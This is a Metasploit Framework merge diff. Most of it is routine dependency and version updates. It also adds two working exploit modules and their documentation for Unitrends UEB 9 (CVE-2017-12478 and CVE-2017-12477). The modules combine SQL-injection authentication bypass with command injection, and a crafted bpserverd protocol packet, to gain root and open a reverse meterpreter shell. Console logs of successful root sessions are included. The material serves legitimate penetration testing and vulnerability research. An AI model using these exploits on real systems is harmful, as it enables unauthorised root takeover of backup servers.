Merge remote-tracking branch 'upstream/master' into netgear_dgn1000_unauth_setup_exec

Gemfile

@@ -19,8 +19,10 @@ group :development do
   # module documentation
   gem 'octokit'
   # Metasploit::Aggregator external session proxy
-  # Disabled for now for crypttlv updates
+  gem 'metasploit-aggregator' if [
-  # gem 'metasploit-aggregator'
+    'x86-mingw32', 'x64-mingw32',
+    'x86_64-linux', 'x86-linux',
+    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
 end
 
 group :development, :test do

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.12)
+    metasploit-framework (4.16.13)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -104,13 +104,14 @@ GEM
     arel (6.0.4)
     arel-helpers (2.5.0)
       activerecord (>= 3.1.0, < 6)
-    backports (3.10.0)
+    backports (3.10.3)
     bcrypt (3.1.11)
     bcrypt_pbkdf (1.0.0)
     bindata (2.4.1)
     bit-struct (0.16)
     builder (3.2.3)
     coderay (1.1.2)
+    concurrent-ruby (1.0.5)
     crass (1.0.2)
     diff-lcs (1.3)
     dnsruby (1.60.2)
@@ -126,15 +127,40 @@ GEM
     ffi (1.9.18)
     filesize (0.1.1)
     fivemat (1.3.5)
+    google-protobuf (3.4.1.1)
+    googleapis-common-protos-types (1.0.0)
+      google-protobuf (~> 3.0)
+    googleauth (0.5.3)
+      faraday (~> 0.12)
+      jwt (~> 1.4)
+      logging (~> 2.0)
+      memoist (~> 0.12)
+      multi_json (~> 1.11)
+      os (~> 0.9)
+      signet (~> 0.7)
+    grpc (1.6.7)
+      google-protobuf (~> 3.1)
+      googleapis-common-protos-types (~> 1.0.0)
+      googleauth (~> 0.5.1)
     hashery (2.1.2)
-    i18n (0.8.6)
+    i18n (0.9.0)
+      concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.1.0)
+    jwt (1.5.6)
+    little-plugger (1.1.4)
+    logging (2.2.2)
+      little-plugger (~> 1.1)
+      multi_json (~> 1.10)
     loofah (2.1.1)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
+    memoist (0.16.0)
     metasm (1.0.3)
+    metasploit-aggregator (1.0.0)
+      grpc
+      rex-arch
     metasploit-concern (2.0.5)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -168,6 +194,7 @@ GEM
     mini_portile2 (2.3.0)
     minitest (5.10.3)
     msgpack (1.1.0)
+    multi_json (1.12.2)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
     net-ssh (4.2.0)
@@ -179,6 +206,7 @@ GEM
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
+    os (0.9.6)
     packetfu (1.1.13)
       pcaprub
     patch_finder (1.0.2)
@@ -195,7 +223,7 @@ GEM
       activerecord (>= 4.0.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
-    pry (0.11.1)
+    pry (0.11.2)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
     public_suffix (3.0.0)
@@ -271,29 +299,29 @@ GEM
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
-    rspec (3.6.0)
+    rspec (3.7.0)
-      rspec-core (~> 3.6.0)
+      rspec-core (~> 3.7.0)
-      rspec-expectations (~> 3.6.0)
+      rspec-expectations (~> 3.7.0)
-      rspec-mocks (~> 3.6.0)
+      rspec-mocks (~> 3.7.0)
-    rspec-core (3.6.0)
+    rspec-core (3.7.0)
-      rspec-support (~> 3.6.0)
+      rspec-support (~> 3.7.0)
-    rspec-expectations (3.6.0)
+    rspec-expectations (3.7.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.6.0)
+      rspec-support (~> 3.7.0)
-    rspec-mocks (3.6.0)
+    rspec-mocks (3.7.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.6.0)
+      rspec-support (~> 3.7.0)
-    rspec-rails (3.6.1)
+    rspec-rails (3.7.1)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
-      rspec-core (~> 3.6.0)
+      rspec-core (~> 3.7.0)
-      rspec-expectations (~> 3.6.0)
+      rspec-expectations (~> 3.7.0)
-      rspec-mocks (~> 3.6.0)
+      rspec-mocks (~> 3.7.0)
-      rspec-support (~> 3.6.0)
+      rspec-support (~> 3.7.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.6.0)
+    rspec-support (3.7.0)
     ruby-rc4 (0.1.5)
     ruby_smb (0.0.18)
       bindata
@@ -304,6 +332,11 @@ GEM
     sawyer (0.8.1)
       addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 1.0)
+    signet (0.8.1)
+      addressable (~> 2.3)
+      faraday (~> 0.9)
+      jwt (>= 1.5, < 3.0)
+      multi_json (~> 1.10)
     simplecov (0.15.1)
       docile (~> 1.1.0)
       json (>= 1.8, < 3)
@@ -332,6 +365,7 @@ PLATFORMS
 DEPENDENCIES
   factory_girl_rails
   fivemat
+  metasploit-aggregator
   metasploit-framework!
   octokit
   pry

documentation/modules/exploit/linux/http/ueb9_api_storage.md

@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+  Unitrends UEB 9 http api/storage remote root
+
+  This exploit leverages a sqli vulnerability for authentication bypass,
+  together with command injection for subsequent root RCE.
+
+## Verification Steps
+
+  1. ```use exploit/linux/http/ueb9_api_storage ```
+  2. ```set lhost [IP]```
+  3. ```set rhost [IP]```
+  4. ```exploit```
+  5. A meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 9.1 on CentOS 6.5
+
+```
+msf > use exploit/linux/http/ueb9_api_storage
+msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
+rhost => 10.0.0.230
+msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
+lhost => 10.0.0.141
+msf exploit(ueb9_api_storage) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.141:4444
+[*] 10.0.0.230:443 - pwn'ng ueb 9....
+[*] Command Stager progress -  19.83% done (164/827 bytes)
+[*] Command Stager progress -  39.30% done (325/827 bytes)
+[*] Command Stager progress -  57.44% done (475/827 bytes)
+[*] Command Stager progress -  75.45% done (624/827 bytes)
+[*] Command Stager progress -  93.35% done (772/827 bytes)
+[*] Command Stager progress - 110.88% done (917/827 bytes)
+[*] Sending stage (826872 bytes) to 10.0.0.230
+[*] Command Stager progress - 126.72% done (1048/827 bytes)
+[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```

documentation/modules/exploit/linux/misc/ueb9_bpserverd.md

@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+  Unitrends UEB 9 bpserverd authentication bypass RCE
+
+  This exploit uses roughly the same process to gain root execution
+  as does the apache user on the Unitrends appliance. The process is
+  something like this:
+
+  1.  Connect to xinetd process (it's usually running on port 1743)
+  2.  This process will send something like: `?A,Connect36092`
+  3.  Initiate a second connection to the port specified
+      in the packet from xinetd (36092 in this example)
+  4.  send a specially crafted packet to xinetd, containing the
+      command to be executed as root
+  5.  Receive command output from the connection to port 36092
+  6.  Close both connections
+
+
+## Verification Steps
+
+  1. ```use exploit/linux/misc/ueb9_bpserverd ```
+  2. ```set lhost [IP]```
+  3. ```set rhost [IP]```
+  4. ```exploit```
+  5. A meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 9.1 on CentOS 6.5
+
+```
+msf > use exploit/linux/misc/ueb9_bpserverd
+msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
+rhost => 10.0.0.230
+msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
+lhost => 10.0.0.141
+msf exploit(ueb9_bpserverd) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.141:4444
+[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
+[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
+[+] 10.0.0.230:1743 - bpd port recieved: 45425
+[*] 10.0.0.230:1743 - Connecting to 45425
+[+] 10.0.0.230:1743 - Connected!
+[*] 10.0.0.230:1743 - Sending command buffer to xinetd
+[*] 10.0.0.230:1743 - Command Stager progress -  26.71% done (199/745 bytes)
+[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
+[+] 10.0.0.230:1743 - bpd port recieved: 40889
+[*] 10.0.0.230:1743 - Connecting to 40889
+[+] 10.0.0.230:1743 - Connected!
+[*] 10.0.0.230:1743 - Sending command buffer to xinetd
+[*] 10.0.0.230:1743 - Command Stager progress -  53.56% done (399/745 bytes)
+[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
+[+] 10.0.0.230:1743 - bpd port recieved: 40016
+[*] 10.0.0.230:1743 - Connecting to 40016
+[+] 10.0.0.230:1743 - Connected!
+[*] 10.0.0.230:1743 - Sending command buffer to xinetd
+[*] 10.0.0.230:1743 - Command Stager progress -  80.27% done (598/745 bytes)
+[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
+[+] 10.0.0.230:1743 - bpd port recieved: 53649
+[*] 10.0.0.230:1743 - Connecting to 53649
+[+] 10.0.0.230:1743 - Connected!
+[*] 10.0.0.230:1743 - Sending command buffer to xinetd
+[*] Sending stage (826872 bytes) to 10.0.0.230
+[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
+[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter >
+
+```

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "4.16.12"
+      VERSION = "4.16.13"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/exploit/http/client.rb

@@ -334,7 +334,7 @@ module Exploit::Remote::HttpClient
   # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
   #
   # @return (see Rex::Proto::Http::Client#send_recv))
-  def send_request_cgi(opts={}, timeout = 20)
+  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else
@@ -362,7 +362,7 @@ module Exploit::Remote::HttpClient
         print_line('#' * 20)
         print_line(res.to_terminal_output)
       end
-      disconnect(c)
+      disconnect(c) if disconnect
       res
     rescue ::Errno::EPIPE, ::Timeout::Error => e
       print_line(e.message) if datastore['HttpTrace']

lib/msf/ui/console/driver.rb

@@ -593,7 +593,7 @@ class Driver < Msf::Ui::Driver
       when "prompt"
         update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true)
       when "promptchar"
-        update_prompt(framework.datastore['Prompt'], val, true)
+        update_prompt(framework.datastore['Prompt'] || DefaultPrompt, val, true)
     end
   end
 

modules/exploits/linux/http/ueb9_api_storage.rb

@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Unitrends UEB 9 http api/storage remote root',
+      'Description'    => %q{
+        It was discovered that the api/storage web interface in Unitrends Backup (UB)
+        before 10.0.0 has an issue in which one of its input parameters was not validated.
+        A remote attacker could use this flaw to bypass authentication and execute arbitrary
+        commands with root privilege on the target system.
+      },
+      'Author'         =>
+        [
+          'Cale Smith',    # @0xC413
+          'Benny Husted', # @BennyHusted
+          'Jared Arave'   # @iotennui
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch' => [ARCH_X86],
+      'CmdStagerFlavor' => [ 'printf' ],
+      'References'     =>
+        [
+          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
+          ['CVE', '2017-12478'],
+        ],
+      'Targets'        =>
+        [
+          [ 'UEB 9.*', { } ]
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
+          'SSL' => true
+        },
+      'DisclosureDate'  => 'Aug 8 2017',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true])
+      ])
+    deregister_options('SRVHOST', 'SRVPORT')
+  end
+
+  #substitue some charactes
+  def filter_bad_chars(cmd)
+    cmd.gsub!("\\", "\\\\\\")
+    cmd.gsub!("'", '\\"')
+  end
+
+  def execute_command(cmd, opts = {})
+    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
+    session = Base64.strict_encode64(session) #b64 encode session token
+
+    #substitue the cmd into the hostname parameter
+    parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
+    parms << filter_bad_chars(cmd)
+    parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
+
+
+    res = send_request_cgi({
+      'uri' => '/api/storage',
+      'method' => 'POST',
+      'ctype'  => 'application/json',
+      'encode_params' => false,
+      'data'   => parms,
+      'headers' =>
+        {'AuthToken' => session}
+    })
+
+    if res && res.code != 500
+      fail_with(Failure::UnexpectedReply,'Unexpected response')
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+  end
+
+  def exploit
+    print_status("#{peer} - pwn'ng ueb 9....")
+    execute_cmdstager(:linemax => 120)
+  end
+end

modules/exploits/linux/misc/ueb9_bpserverd.rb

@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Unitrends UEB bpserverd authentication bypass RCE',
+      'Description'    => %q{
+       It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
+       has an issue in which its authentication can be bypassed.  A remote attacker could use this
+       issue to execute arbitrary commands with root privilege on the target system.
+      },
+      'Author'         =>
+        [
+          'Jared Arave',  # @iotennui
+          'Cale Smith',   # @0xC413
+          'Benny Husted'  # @BennyHusted
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch' => [ARCH_X86],
+      'CmdStagerFlavor' => [ 'printf' ],
+      'References'     =>
+        [
+          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],
+          ['CVE', '2017-12477'],
+        ],
+      'Targets'        =>
+        [
+          [ 'UEB 9.*', { } ]
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
+          'SSL' => false
+        },
+      'DisclosureDate'  => 'Aug 8 2017',
+      'DefaultTarget'   => 0))
+    register_options([
+        Opt::RPORT(1743)
+      ])
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    s1 = connect(global = false)
+    buf1  = s1.get_once(-1).to_s
+    #parse out the bpd port returned
+    bpd_port = buf1[-8..-3].to_i
+
+    #check if it's a valid port number (1-65534)
+    if bpd_port && bpd_port >= 1 && bpd_port <= 65535
+      Exploit::CheckCode::Detected
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+
+    #append a comment, ignore everything after our cmd
+    cmd = cmd + " #"
+
+    # build the attack buffer...
+    command_len = cmd.length + 3
+    packet_len = cmd.length + 23
+    data =  "\xa5\x52\x00\x2d"
+    data << "\x00\x00\x00"
+    data << packet_len
+    data << "\x00\x00\x00"
+    data << "\x01"
+    data << "\x00\x00\x00"
+    data << "\x4c"
+    data << "\x00\x00\x00"
+    data << command_len
+    data << cmd
+    data << "\x00\x00\x00"
+
+    begin
+      print_status("Connecting to xinetd for bpd port...")
+      s1 = connect(global = false)
+      buf1  = s1.get_once(-1).to_s
+
+      #parse out the bpd port returned, we will connect back on this port to send our cmd
+      bpd_port = buf1[-8..-3].to_i
+
+      print_good("bpd port recieved: #{bpd_port}")
+      vprint_status("Connecting to #{bpd_port}")
+
+      s2 = connect(global = false, opts = {'RPORT'=>bpd_port})
+      vprint_good('Connected!')
+
+      print_status('Sending command buffer to xinetd')
+
+      s1.put(data)
+      s2.get_once(-1,1).to_s
+
+      disconnect(s1)
+      disconnect(s2)
+
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      fail_with(Failure::Unreachable, "#{peer} - Connection to server failed")
+    end
+
+  end
+
+  def exploit
+    print_status("#{peer} - pwn'ng ueb 9....")
+    execute_cmdstager(:linemax => 200)
+  end
+end

modules/exploits/unix/polycom_hdx_auth_bypass.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         'Name'            => 'Polycom Command Shell Authorization Bypass',
-        'Alias'           => 'psh_auth_bypass',
+        'Alias'           => 'polycom_hdx_auth_bypass',
         'Author'          =>
           [
             'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module

modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb

@@ -494,7 +494,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ].pack('v')
 
     else
-      fail_with(Failure::NoTarget, "Unknown target #{targetr['Method']}")
+      fail_with(Failure::NoTarget, "Unknown target #{target['Method']}")
     end
 
     # Build the ANI file